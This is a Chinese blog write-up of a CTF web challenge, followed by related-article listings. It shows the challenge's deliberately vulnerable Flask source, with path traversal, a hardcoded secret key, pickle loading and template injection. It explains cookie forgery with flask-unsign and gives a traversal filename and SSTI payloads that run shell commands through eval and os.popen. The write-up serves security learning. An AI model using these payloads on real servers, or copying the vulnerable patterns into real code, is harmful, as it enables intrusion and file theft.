一道有趣的web题(目录穿越、session 伪造和 SSTI)

于 2024-10-03 17:18:37 发布
阅读量435 收藏 7
点赞数 10
分类专栏: web题 文章标签: 服务器 flask python web 网络安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_72929232/article/details/142692140
版权

韬哥出的一道题,上课的时候没做出来,没想到目录穿越我还以为是文件上传(韬哥还是tql)

相关考点:目录穿越、session 伪造和 SSTI

第一部分(目录穿越)

观察到唯一可用的入口点位于个人信息,而上传文件的接口并没有实际上对文件类型进行过滤(选择上传文件时的窗口会有默认选项,但是可以进行修改)。同时,发现上传非图片文件后右侧原本显示的图片会无法显示,因此可以推定后端并没有进行文件类型的判断。尝试 fuzz 一些路径穿越的文件名(如 `../../../../../../../../etc/passwd` )后会发现图片的接口 `/showPhoto` 确实返回了这个文件内容,所以根据 flask 的项目结构爆破 `../app.py`,`../../app.py` 等路径后每次通过 `showPhoto` 接口进行检查,可以发现源码在 `../../app.py`,得到 flag1 和 flask 的 session key

from flask import *
import base64
import os
import requests
import pickle

app = Flask(__name__, static_url_path="/resources", static_folder="resources")
flag1 = 'flag{d2c4d1bb89a7d5386390f750bbdad8a7}'
# flag2 = os.environ.get("FLAG2")
app.secret_key = flag1

@app.route('/')
def idx():
    if 'username' not in session:
        session['username'] = 'defaulter'
    return render_template('index.html')

@app.route('/pubtzgg/<v>')
def iframe(v):
    if 'username' not in session:
        session['username'] = 'defaulter'
    return render_template('queryTzggByMxxs')

@app.route('/queryClass')
def page():
    if 'username' not in session:
        session['username'] = 'defaulter'
    return render_template('queryClass.html')

@app.route('/personalPage')
def info():
    if 'username' not in session:
        session['username'] = 'defaulter'
    return render_template('personalPage.html')

@app.route('/showPhoto', methods=['GET'])
def load_photo():
    if 'username' not in session:
        session['username'] = 'defaulter'
    uname = session['username']
    fd = open('./private/db/list.txt', 'r')
    db = fd.readlines()
    fd.close()
    filename = 'missing.png'
    for line in db:
        if uname in line:
            filename = line.split(uname)[1][1:].strip()
    
    return send_file('./private/avatar/'+filename, mimetype='image/png')

@app.route('/updatePhoto', methods=['POST'])
def send_photo():
    if 'username' not in session:
        session['username'] = 'defaulter'
        return redirect('/')
    uname = session['username']
    p = request.files['new']
    new_name = p.filename
    fd = open('./private/db/list.txt', 'r')
    db = fd.readlines()
    fd.close()
    for idx in range(len(db)):
        line = db[idx]
        if uname in line:
            filename = line.split(uname)[1][1:].strip()
            db[idx] = f'{uname}:{new_name}'
    fd = open('./private/db/list.txt', 'w')
    fd.writelines(db)
    fd.close()
    basepath = os.path.dirname(__file__)
    o_img_path = os.path.join(basepath, "private/avatar", new_name)
    p.save(o_img_path)
    return render_template('personalPage.html')

@app.route('/interestingAdmin')
def dashboard():
    if 'username' in session and session['username'] == 'admin':
        session['username'] = 'admin'
        r = requests.get('http://127.0.0.1:8889/api').text
        print(r)
        c,n,s,p = pickle.loads(base64.b64decode(r))
        template = f'''<tr class="qinfo">
                        <td width="400">
                            {{{{ "{c.strip()}" }}}}
                        </td>
                        <td width="400">
                            {{{{ "{n.strip()}" }}}}
                        </td>
                        <td width="400">
                            {{{{ "{s.strip()}" }}}}
                        </td>
                        <td width="400">
                            {{{{ "{p.strip()}" }}}}
                        </td>
                    </tr>
                '''
        insertion = render_template_string(template)
        return render_template('admin.html', insertion = insertion)
    return redirect('/')

@app.post('/adminUpdateDB')
def upd():
    if 'username' in session and session['username'] == 'admin':
        c,n,s,p = request.form['code'].strip(), request.form['name'].strip(), request.form['score'].strip(), request.form['period'].strip()
        if not c.isdigit() or not s.isdigit() or not p.isdigit():
            return '请检查输入是否正确!'
        d = pickle.dumps([c,n,s,p])
        pl = base64.b64encode(d)
        requests.post('http://127.0.0.1:8889/api', data={'payload':pl})
    return redirect('/interestingAdmin')

@app.errorhandler(403)
def forbidden(e):
    return render_template('403.html'), 403

@app.errorhandler(404)
def page_not_found(e):
    return render_template('404.html'), 404

@app.errorhandler(500)
def page_not_found(e):
    return render_template('500.html'), 500

if __name__ == '__main__':
    app.run('0.0.0.0', port=8888, debug=False)

第二部分(session伪造)

flask-unsign安装下载以及用法:

Paradoxis/Flask-Unsign: Command line tool to fetch, decode, brute-force and craft session cookies of a Flask application by guessing secret keys. (github.com)

得到 session key 和 app.py 中的隐藏路由后可以通过 flask-unsign 伪造 session 正常使用 `/interestingAdmin` 的后台接口。

第三部分(SSTI)

通过源码得知此处每个字段在后端的模板字符串都是类似 `f'{{"{key}"}}'` 的格式,需要在前后分别添加一个双引号进行逃逸。测试输入 `"+(7*7).__str__()+"`,发现这里的双引号成功逃逸了,完成 SSTI,因此更改 payload 即可进行 RCE,拿到 flag2。

"+x.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('ls /').read()")+"

"+x.__init__.__globals__['__builtins__']['eval']("__import__('os').popen('sudo cat /flag').read()")+"

影杀~
关注
专栏目录
web安全之目录穿越
weixin_54584489的博客
04-13 3699
目录穿越(又称目录遍历diretory traversal/path traversal)是通过目录控制序列 ../ 或者文件绝对路径来访问存储在文件系统上的任意文件和目录的一种漏洞。
目录穿越
qq_41232519的博客
07-06 4993
1、 漏洞简介及成因 Nginx反向代理,静态文件存储在/home/下,而访问时需要在url中输入files,配置文件中/files没有用/闭合,导致可以穿越至上层目录。 2、 漏洞复现 访问:http://192.168.139.128:8081/files/ 访问:http://192.168.139.128:8081/files…/ 成功实现目录穿越: 3、 漏洞修复 Nginx的配置文件/etc/nginx/conf.d/error2.conf的/files使用/闭合。 ...
WEB安全基础入门—目录遍历(路径遍历\路径穿越攻击)
Eason_LYC安全白帽子的成长博客
06-06 3317
WEB安全基础入门-目录遍历(路径遍历、路径穿越攻击) 欢迎关注订阅专栏! WEB安全系列包括如下三个专栏: 《WEB安全基础-服务器端漏洞》 《WEB安全基础-客户端漏洞》 《WEB安全高级-综合利用》 知识点全面细致,逻辑清晰、结合实战,并配有大量练习靶场,让你读一篇、练一篇,掌握一篇,在学习路上事半功倍,少走弯路! 欢迎关注订阅专栏!......
Web安全基础学习:文件上传漏洞之前端校验
最新发布
qq_51862722的博客
06-22 648
文件上传漏洞:字如其意,就是可能出现在一切允许上传文件的功能点。它是指由于程序员未对上传的文件进行严格的验证和过滤,而导致的用户可以越过其本身权限向服务器上上传可执行的动态脚本文件。这里上传的文件可以是木马,病毒,恶意脚本或者WebShell等。这种攻击方式是最为直接和有效的,“文件上传”本身没有问,有问的是文件上传后,服务器怎么处理、解释文件。如果服务器的处理逻辑做的不够安全,则会导致严重的后果。
ctfshow->web入门->ssti的前八
2301_80481202的博客
03-16 674
ssti介绍:SSTI(Server-Side Template Injection)是一种Web应用程序安全漏洞,它允许攻击者在服务器端的模板引擎中注入恶意代码。这种漏洞通常发生在使用模板引擎来动态生成Web页面内容的应用程序中。攻击者可以通过在用户输入中注入恶意模板代码,利用模板引擎的执行能力来执行任意代码,包括读取敏感数据、执行系统命令等。SSTI漏洞可能导致严重的安全问,如信息泄露、服务器拒绝服务(DoS)攻击或远程代码执行。
[LineCTF2022]gotm ( golang SSTI + JWT伪造 )
ShenZ的博客
04-15 5476
我们的思路是利用ssti得到secret_key,再伪造jwt即可得到flag。 如果是正常思路我们应该{{.secret_key}}注入得到key字段,但是root_handler函数中得到的acc是数组中的地址,也就是get_account函数通过在全局变量acc数组中查找我们的用户,这种情况下直接注入{{.secret_key}}会返回空 我们的payload应该是{{.}},可以得到 Account结构的所有字段 /regist?id={{.}}&pw=123 /auth?id={{.}}&
攻防世界easy_webSSTI注入
m0_66935689的博客
07-29 310
昨天不是放假了嘛想着做几道的刚好碰到个文件上传的条件竞争整半天头都整大了,网上搜了一下文章质量都参差不齐像我这种菜狗根本看不懂没办法花了两个金币看官方的writeup但还没研究明白就想着做一下其它把那两个金币挣回来就刚好碰到这玩意。str = '''{{a.__init__.__globals__.__builtins__.eval("__import__('os').popen('ls').read()")}}''' # 原字符串。随便试了一下确定了这玩意会把我们输入的参数当作html解析。
[ctf web]SSTI PHP的模板注入SSTI (smarty+Twig) 以及[BJDCTF2020]Cookie is so stable
ShenZ的博客
08-30 3641
PHP的模板注入 如果是在cookie处执行,最好抓包打payload,可能有url编码的问 smarty模板注入 控制XFF进行命令执行(这是要在前端有IP相关回显的情况) payload: X-Forwarded-For: {{system("ls")}} 利用 {$smarty.version} //smarty的版本号 标签 {php} 可以使用{php}{/php}标签来执行被包裹其中的php指令 {php}phpinfo();{/php} Smarty已经废弃{php}标签,
web安全-SSTI模板注入漏洞
weixin_61956136的博客
07-31 3763
web安全-SSTI模板注入漏洞
网络安全 | CTF】一文带你了解SSTI漏洞 + Web_python_template_injection解详析
等风来
05-28 5720
2.命令执行注入:攻击者在应用程序中的命令执行语句中注入模板代码,从而执行任意系统命令,获取系统权限,对系统进行攻击等。3.变量渲染注入:攻击者在应用程序中的变量渲染语句中注入模板代码,从而影响页面的输出,导致代码执行或信息泄漏等问。在 Python 3 中,当对一个未导入的模块(如 os 模块)执行 eval() 函数时,linecache 模块会发出一个警告,可利用这个警告来读取敏感信息。1.条件语句注入:攻击者在应用程序中的条件语句中注入模板代码,从而控制条件判断的分支,导致程序的逻辑错误。
Ctfshow web入门 SSTI 模板注入篇 web361-web372 详细解 全
Jay17的博客
08-10 1555
Ctfshow web入门 SSTI 模板注入篇 web361-web372 详细解 全
SSTI练习 web361--web372
qing_chuan_的博客
06-15 268
我一步一步试了试,过滤了几个数字2,3等,正好把我可用的os模块没法用了,上网看了好多大佬们的wp可以用全角数字来代替正常数字。这里要提醒我自己一下,这里到用到use_for,自己在哪里拼了半天就是不对。要寄漏,原来过了单双引号啊,当然要用老方法了,request拼接。用subprocess.Popen(),也不行。这开始过滤了,过了啥,上一大佬的脚本仍然可以用。哈哈哈,终于到了{}了,直接{%%}+print。加了args过滤,用cookie就好了。上一全角数字的不能用了。
ssti模板注入(入门级)Web_python_template_injection
qq_62046696的博客
05-29 734
Web_python_template_injection(攻防世界进阶) 打开界面判断一下是否是ssti注入? 输入{{7*7}}执行成功得到49,说明存在ssti模板注入 __class__ 返回类型所属的对象 __mro__ 返回一个包含对象所继承的基类元组,方法在解析时按照元组的顺序解析。 __base__ 返回该对象所继承的基类 // __base__和__mro__都是用来寻找基类的 __subclasses__ 每个新类都保留了子类的引用,这个方法返回一个类中
Web】Ctfshow SSTI记录1
uuzeray的博客
11-19 1271
目给到Hint,尝试传?name={{1-1}}测试出ssti注入点。使用{%%}绕过,再借助print()回显。
SSTI模板注入-中括号、args、下划线、单双引号、os、request、花括号被过滤绕过(ctfshow web入门369)
T1ngSh0w的博客
03-30 2335
ctfshow web入门369 中括号、args、request、花括号、引号、中括号、os被过滤绕过 SSTI模板注入漏洞过滤绕过
目录穿越/遍历漏洞及对其防御方法的绕过
2301_77004573的博客
04-30 5481
目录穿越目录遍历)是一个Web安全漏洞,攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件。这可能包括应用程序代码和数据,后端系统的登录信息以及敏感的操作系统文件。目录穿越不仅可以访问服务器中的任何目录,还可以访问服务器中任何文件的内容。例如,攻击者通过浏览器访问…/…/…/…/…/…/…/…/…/…/…/…/…/…/etc/passwd(此处较多…/),就可以读取Linux服务器目录下的etc目录下的passwd文件的内容。
目录穿越/遍历漏洞 -- 学习笔记
热门推荐
angry_program的博客
08-07 2万+
目录 什么是目录遍历? 漏洞原理 实验 0x00 基础目录遍历 0x01 绝对路径 0x02 双写../绕过 0x03 URL编码绕过 0x04 绝对路径配合../ 0x05 截断文件后缀 防御 什么是目录遍历? 目录遍历(目录穿越)是一个Web安全漏洞,攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件。 这可能包括应用程序代码和数据,后端系统的登录信息以及敏感的操作系统文件。 在某些情况下,攻击者可能能够在服务器上写入任意文件,(如,FFFTP是一款小型...
目录穿越/遍历漏洞
小白的劝退之路
01-26 9226
目录 什么是目录遍历? 漏洞原理 实验 0x00 基础目录遍历 0x01 绝对路径 0x02 双写../绕过 0x03 URL编码绕过 0x04 绝对路径配合../ 0x05 截断文件后缀 防御 什么是目录遍历? 目录遍历(目录穿越)是一个Web安全漏洞,攻击者可以利用该漏洞读取运行应用程序的服务器上的任意文件。 这可能包括应用程序代码和数据,后端系统的登录信息以及敏感的操作系统文件。 在某些情况下,攻击者可能能够在服务...
buu ctf web进阶]ssti
08-23
在buu ctf web进阶中,ssti代表 Side Template Injection,是一种应用程序中的安全漏洞。通过此漏洞,攻击者可以注入恶意代码到服务器端的模板引擎,从而执行任意代码或获取敏感信息。这种漏洞可能导致服务器被入侵...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值